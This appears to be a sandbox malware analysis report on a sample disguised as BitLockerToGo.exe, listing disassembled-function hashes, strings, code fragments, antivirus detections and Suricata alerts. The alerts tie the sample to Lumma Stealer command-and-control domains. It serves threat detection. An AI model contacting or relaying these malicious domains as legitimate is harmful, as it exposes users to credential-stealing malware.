Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32cc473a49a043d5d9afef76dd08838e1141e6670491a727a4120e77ea321e5f
Instruction ID: d1d0490c66e92aad3f670c92c5804bc9babcbdf8b8e5eb065674985f0bd88c4c
Opcode Fuzzy Hash: 32cc473a49a043d5d9afef76dd08838e1141e6670491a727a4120e77ea321e5f
Instruction Fuzzy Hash: 8AE16CB29087408FC334CF68C8857ABB7F1BF85318F48492ED5DAD6382D679A145CB4A

Function 00435F40 Relevance: .4, Instructions: 373COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e35c10c45400d38fb356e8e65daf3df707092109f68a72c8198051bbacc98ee
Instruction ID: 691cd07f7fda29e22ecff155b1a25d560500086e537156fac0c575f385e5dab4
Opcode Fuzzy Hash: 7e35c10c45400d38fb356e8e65daf3df707092109f68a72c8198051bbacc98ee
Instruction Fuzzy Hash: 46C1693460C241DFD705EF28D99062AB7E2FF8A305F19896EE5C587361C339D861CB9A

Function 00410311 Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f051e6a752173ee78f8c7fc004e858bfe4cca8f7a3b2b14d9e1d356eb2f34e49
Instruction ID: e968a7576203061631303996014009d181c5a7b54f1e0244b484fe3362749e99
Opcode Fuzzy Hash: f051e6a752173ee78f8c7fc004e858bfe4cca8f7a3b2b14d9e1d356eb2f34e49
Instruction Fuzzy Hash: 2AD10474200B418BD325CF29D690A57B7F1EF46B04F04C95EE4AA87B92D378F895CB58

Function 00413F95 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2bb4c271b1fdb9fb4f218042cbf8f62ea73290cf06561dce0a400a4c229e85c
Instruction ID: a54eeee738581116fed33a5ba7f68adbe55b8f0cf808456859582a5b01b3aa38
Opcode Fuzzy Hash: e2bb4c271b1fdb9fb4f218042cbf8f62ea73290cf06561dce0a400a4c229e85c
Instruction Fuzzy Hash: 8E51EFB5A043018BC7109F25E88167BB7F1FFD6344F08182EE98597391EB399C85C76A

Function 0042E720 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d860c81ce0d500fabe58317278b01e933b7f504a93dab5397bc0fba462de02d3
Instruction ID: 4863f00a69196a06ff7d35167ef77e000687aaf4e6d92825dfccd3d33f44ba38
Opcode Fuzzy Hash: d860c81ce0d500fabe58317278b01e933b7f504a93dab5397bc0fba462de02d3
Instruction Fuzzy Hash: 0B6170B1A087548FE314DF29D49435BBBE1BBC8318F544A2EE5D987350E379D9088F86

Function 0041DEBD Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ddfe711770ee7e98bb5744ad35bca8687b8e608ceb6b4e329f4f87898d76d47
Instruction ID: d50fbe92978711f49e111c4fd00aab6cdb82ad7c0ea3fdc5569a3a398a8444f1
Opcode Fuzzy Hash: 8ddfe711770ee7e98bb5744ad35bca8687b8e608ceb6b4e329f4f87898d76d47
Instruction Fuzzy Hash: 8A51C0716187418BC719CF38D89076BB7E1BBC9314F18862EE99AC73D1EB38A941CB45

Function 0041B966 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85faaeda0eedd534d3788d61d01365339d6868af0e0d7a22645d374253a33662
Instruction ID: ffb97cddb808e99d56c2af5d85206bb189f5ad853c69c651067383e31bfd6b7c
Opcode Fuzzy Hash: 85faaeda0eedd534d3788d61d01365339d6868af0e0d7a22645d374253a33662
Instruction Fuzzy Hash: 855169726583858BE7208F24C4817EBB7E1EF85390F28892ED5DD87351C738D885DB8A

Function 0040D370 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b5abd090cee4f5317031dae8dae65a5d4d911471fcab6192d68847eb25936ae
Instruction ID: 0064ac186b7bbd3e749f2930d9468bcbd5e63db38633a81cbc77c160381e6f41
Opcode Fuzzy Hash: 9b5abd090cee4f5317031dae8dae65a5d4d911471fcab6192d68847eb25936ae
Instruction Fuzzy Hash: 0241F732A1C3940FD318CE79889012ABBD29BC5210F19C73EF4A5C73D5E678990AD755

Function 004032C0 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f30a0bc66c3722f9b2ddcbb341264861a667be577a3dcddc0a234e27146eee1d
Instruction ID: 2fea7628ff4b73d536fb4a1e53cff937fd1aa384e89895c90ac4d58fb1ad5526
Opcode Fuzzy Hash: f30a0bc66c3722f9b2ddcbb341264861a667be577a3dcddc0a234e27146eee1d
Instruction Fuzzy Hash: 4E31C7716082009BD7149F59C8C092BBBE5EFC4315F18893EED9AA7381D739DE42CB4A

Function 00412D3E Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d817b09f116c10d1d6d3906d8393c749704e4c285e285247069dc82c1eece2dd
Instruction ID: ce9337bc5f9be09e61f465c31ff69b18baeec3d040ded8561671f18d9f8bc6c4
Opcode Fuzzy Hash: d817b09f116c10d1d6d3906d8393c749704e4c285e285247069dc82c1eece2dd
Instruction Fuzzy Hash: 4D213770404A408FE369CF28D684B66B7E0FF0A300F64196ED1C2D7662E375E861CB98

Function 0042A4E0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 87948661a9b0fa87b1be4a84d18f230de44486641b195b1d13c01201bfaea9d8
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 2811A332B051E40BC3168D3C9400566BFE20B93634B9D839AE8B49B2D2D6268DCA835A

Function 0041FB40 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1f2267203b301f81c51f20cf1efc0b25c541b38e141f33b1a45d4e49cf7f9a0
Instruction ID: b1577958c7b90e898e286b9302b23e8aa1a960fc5e034a8b86832ca7158c3b88
Opcode Fuzzy Hash: a1f2267203b301f81c51f20cf1efc0b25c541b38e141f33b1a45d4e49cf7f9a0
Instruction Fuzzy Hash: 0701B1F160430147DB209E12D5E0B67B2A86F80708F08083EE80957342DB7EFC8AC299

Function 00404060 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74aff76a6304d82e6f8059f08a6b35bd8f7d1e4cdec41403e5fbcae725a6d4c6
Instruction ID: 05edec98666aa19291301049c39e7aaea20270d8f81634e1fde94630ee78b971
Opcode Fuzzy Hash: 74aff76a6304d82e6f8059f08a6b35bd8f7d1e4cdec41403e5fbcae725a6d4c6
Instruction Fuzzy Hash: 0601D6767143090B9304DD7A9C80527B3D6DBC9214B19413DEE41E3346EC35E80992A9

Function 00412DB0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69f235b1c2c7c7d436e96b6dab25d4bb7dfb041b7c36af40f1b4ff172f233824
Instruction ID: 21613c987e9b4697237e2ba6ef21625583a02de0e9897250edb5d248c9405db5
Opcode Fuzzy Hash: 69f235b1c2c7c7d436e96b6dab25d4bb7dfb041b7c36af40f1b4ff172f233824
Instruction Fuzzy Hash: E9F05CB1A0412027DB328944ECC4F77BF9CDB97324F090426E840D3242D1B55885C3EE

Function 00431060 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: 337b698311cb40e32e2ecdce48dec87f02b10fe3c5a1e16f269a970fa3b9edba
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: 82D0A52150C361465B7C8D199410577F7F0E9C7751F45555FF581D3258D234DC41C16D

Function 004208B0 Relevance: 71.9, APIs: 2, Strings: 39, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 004208F9
GetSystemMetrics.USER32 ref: 0042090C

Strings

s, xrefs: 00420CEB
s, xrefs: 00420CD5
s, xrefs: 00420F11
s, xrefs: 00420FAB
s, xrefs: 00420D59
s, xrefs: 00420EB9
s, xrefs: 00420E61
s, xrefs: 00420F95
s, xrefs: 00420D43
s, xrefs: 00420F27
s, xrefs: 00420D85
s, xrefs: 00420C93
s, xrefs: 00420EA3
s, xrefs: 00420DC7
s, xrefs: 00420EE5
s, xrefs: 00420ECF
s, xrefs: 00420EFB
s, xrefs: 00420F53
s, xrefs: 00420E09
s, xrefs: 00420E4B
s, xrefs: 00420D6F
s, xrefs: 00420D2D
s, xrefs: 00420E35
s, xrefs: 00420E1F
s, xrefs: 00420DB1
s, xrefs: 00420D17
s, xrefs: 00420F3D
s, xrefs: 00420CBF
s, xrefs: 00420F7F
s, xrefs: 00420CA9
s, xrefs: 00420E8D
s, xrefs: 00420FC1
s, xrefs: 00420D9B
s, xrefs: 00420F69
4 B, xrefs: 00420A41
s, xrefs: 00420DDD
s, xrefs: 00420E77
s, xrefs: 00420D01
s, xrefs: 00420DF3

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: MetricsSystem
String ID: 4 B$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s
API String ID: 4116985748-3957770231
Opcode ID: 5c02abe461a94103f1ea6243f9bdc85d1a0b7ae4f1ee041aa6ccc8a0d1184a3d
Instruction ID: 194e304ccfc4b87daa69092e938f3c75a9af4ee08c66b97b052ba8d7ac6fd6b3
Opcode Fuzzy Hash: 5c02abe461a94103f1ea6243f9bdc85d1a0b7ae4f1ee041aa6ccc8a0d1184a3d
Instruction Fuzzy Hash: 2DE11EB480E3C18BE775DF12D1587CBBAE4AB89348F10A90E918D0B694C7B91159DF8F

Function 004285CB Relevance: 49.2, APIs: 1, Strings: 27, Instructions: 162
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 00428686

Strings

1, xrefs: 004286CC
{, xrefs: 0042887C
+, xrefs: 004286FC
!, xrefs: 0042874C
q, xrefs: 004288CC
J, xrefs: 00428704
%, xrefs: 0042872C
-, xrefs: 004286EC
w, xrefs: 0042889C
F, xrefs: 00428724
~, xrefs: 00428714
|, xrefs: 00428774
u, xrefs: 004288AC
3, xrefs: 004286BC
/, xrefs: 004286DC
p, xrefs: 004288D4
), xrefs: 0042870C
s, xrefs: 004288BC
y, xrefs: 0042888C
#, xrefs: 0042873C
', xrefs: 0042871C
Y, xrefs: 004287B4
o, xrefs: 004288DC
}, xrefs: 0042886C
\, xrefs: 004287C4
5, xrefs: 004286AC
0, xrefs: 00428997

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: !$#$%$'$)$+$-$/$0$1$3$5$F$J$Y$\$o$p$q$s$u$w$y${$|$}$~
API String ID: 2525500382-2295497677
Opcode ID: bbf7e3676419c636f8b9839a31591162d0d42abc34aa649a4376ca41ae0468b2
Instruction ID: b0ba2e667e51aff54430eee1eb799e6b0885a3efe6f1988baee3fbc5f7c963a5
Opcode Fuzzy Hash: bbf7e3676419c636f8b9839a31591162d0d42abc34aa649a4376ca41ae0468b2
Instruction Fuzzy Hash: 92B1B47040C7C28ED336CA2C84487DBBFE06BA6324F084A9DE5E94B2E2D3B54545D767

Function 004275FD Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 90COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00427607
VariantInit.OLEAUT32 ref: 0042761A

Strings

9, xrefs: 004276B5
9, xrefs: 00427715
8, xrefs: 00427695
$, xrefs: 00427705
-, xrefs: 00427675
?, xrefs: 004276C5
4, xrefs: 00427685
', xrefs: 004276F5
1, xrefs: 0042763D
,, xrefs: 004276E5
!, xrefs: 004276D5
7, xrefs: 0042766D
3, xrefs: 0042764D
5, xrefs: 0042765D

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$$$'$,$-$1$3$4$5$7$8$9$9$?
API String ID: 2610073882-3394242493
Opcode ID: 35b36b21b003f0d3413634a273a06cd5051137b29d67969a11104eaa24dad8f4
Instruction ID: 735d984d0992e765012052a8f0fb0489a1963148359809200d699fe7ae86a843
Opcode Fuzzy Hash: 35b36b21b003f0d3413634a273a06cd5051137b29d67969a11104eaa24dad8f4
Instruction Fuzzy Hash: FC51D46010C7C1CED336CB38955979BBFE0AB92224F488E5ED0E94B2D2D7B4454ACB67

Function 0042833B Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 86COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00428345
VariantInit.OLEAUT32 ref: 00428358

Strings

0, xrefs: 004283E3
=, xrefs: 0042839B
9, xrefs: 0042837B
?, xrefs: 004283AB
), xrefs: 00428433
#, xrefs: 00428423
!, xrefs: 00428413
!, xrefs: 004283F3
!, xrefs: 004283D3
;, xrefs: 0042838B

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$!$!$#$)$0$9$;$=$?
API String ID: 2610073882-1020156382
Opcode ID: e77addcd8e8f7e12adbee9aa9b2895eba74f2890813fe44a94c8d42aa235ee11
Instruction ID: 445f5192c9e89f47ba71f78aaa9288de378146ae2ae34c2532c8075f024d2512
Opcode Fuzzy Hash: e77addcd8e8f7e12adbee9aa9b2895eba74f2890813fe44a94c8d42aa235ee11
Instruction Fuzzy Hash: CC51C46010D7C18AE336DB289858B9FBFE1ABA2324F084F5DD5E9472D2D7B44105CB57

Function 00428C77 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 82COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00428C81
VariantInit.OLEAUT32 ref: 00428C94

Strings

M, xrefs: 00428D10
L, xrefs: 00428CDE
N, xrefs: 00428CE8
\, xrefs: 00428D06
/, xrefs: 00428CC0
6, xrefs: 00428CB6
P, xrefs: 00428CCA

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: /$6$L$M$N$P$\
API String ID: 2610073882-3443906974
Opcode ID: 5685d9a769451867e9002c7bdc93a8b227197281bd795ebfe66d416927059e95
Instruction ID: 9bfdd88ac9e6d5e4680af8ee51f3061d14cf5464212aa11ade2540f6c222105d
Opcode Fuzzy Hash: 5685d9a769451867e9002c7bdc93a8b227197281bd795ebfe66d416927059e95
Instruction Fuzzy Hash: D741F57010CBC18ED325DB38845865EBFE1ABA2224F184A5DE5E5473E2D7748049CB97

Function 00427D82 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 72COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00427D8C

Strings

T, xrefs: 00427DC7
Z, xrefs: 00427E07
U, xrefs: 00427DF7
Z, xrefs: 00427DD7
I, xrefs: 00427DE7

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitVariant
String ID: I$T$U$Z$Z
API String ID: 1927566239-1719520546
Opcode ID: 651a17f79a185e44fc2f9de5e46122b46b2bad5853652d742592e23de561e837
Instruction ID: 81eb9c43cad1dfe977023031b9347ee7f38ee98e0f31d030cf273a45464692ce
Opcode Fuzzy Hash: 651a17f79a185e44fc2f9de5e46122b46b2bad5853652d742592e23de561e837
Instruction Fuzzy Hash: 1641DE3010C7C18AD335DB28C59479FBBE1AB96314F048E5EE1EA5B292C7754849CB63

Source: https://potentioallykeos.shop/api	Avira URL Cloud: Label: malware
Source: https://interactiedovspm.shop/api	Avira URL Cloud: Label: malware
Source: https://potentioallykeos.shop/	Avira URL Cloud: Label: malware
Source: https://interactiedovspm.shop/	Avira URL Cloud: Label: malware
Source: https://largerryskwhq.shop/api	Avira URL Cloud: Label: malware
Source: https://potentioallykeos.shop/ql	Avira URL Cloud: Label: malware

Source: interactiedovspm.shop	Virustotal: Detection: 20%	Perma Link
Source: charecteristicdxp.shop	Virustotal: Detection: 20%	Perma Link
Source: largerryskwhq.shop	Virustotal: Detection: 8%	Perma Link
Source: potentioallykeos.shop	Virustotal: Detection: 20%	Perma Link
Source: https://potentioallykeos.shop/	Virustotal: Detection: 19%	Perma Link
Source: https://interactiedovspm.shop/api	Virustotal: Detection: 22%	Perma Link
Source: https://interactiedovspm.shop/	Virustotal: Detection: 20%	Perma Link
Source: https://potentioallykeos.shop/api	Virustotal: Detection: 22%	Perma Link
Source: https://largerryskwhq.shop/api	Virustotal: Detection: 16%	Perma Link

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	2_2_0040C4A6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	2_2_00404060
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	2_2_00431060
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, ebp	2_2_00407020
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	2_2_00425833
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx]	2_2_0041E0E3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	2_2_0040A8F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_004188F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	2_2_004368B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	2_2_00410961
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000878h]	2_2_0041B966
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	2_2_00420100
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push esi	2_2_004199C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esi+0Ch], 00000000h	2_2_004101D2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000108h]	2_2_004241B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edx], 77A9E0C4h	2_2_00436A60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [eax], 44CAAEB6h	2_2_0041922D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	2_2_004032C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000108h]	2_2_004241B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_004132B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_0041FB40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+18h]	2_2_0041CB50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [esp+50h]	2_2_0041F318
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_004143E2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	2_2_004143E2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	2_2_004143E2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	2_2_004143E2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi]	2_2_0040BB80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_0042A4E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+70h]	2_2_00411501
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000878h]	2_2_0041A502
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_0041A502
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi]	2_2_00412D3E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	2_2_004205C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+1Ch]	2_2_0040B5F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp+04h]	2_2_0040B5F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	2_2_00412DB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	2_2_00436E60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	2_2_00418690
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, ebx	2_2_00434E94
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]	2_2_0040E726
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]	2_2_0040E726
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000108h]	2_2_0042473C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0041E7D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0041E7D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00413F95
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [eax], dl	2_2_0040DFAA

Source: Network traffic	Suricata IDS: 2055293 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (charecteristicdxp .shop) : 192.168.2.5:50915 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055300 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (interactiedovspm .shop in TLS SNI) : 192.168.2.5:49705 -> 104.21.42.119:443
Source: Network traffic	Suricata IDS: 2055299 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (interactiedovspm .shop) : 192.168.2.5:61958 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055301 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (potentioallykeos .shop) : 192.168.2.5:49359 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055294 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (charecteristicdxp .shop in TLS SNI) : 192.168.2.5:49710 -> 172.67.186.145:443
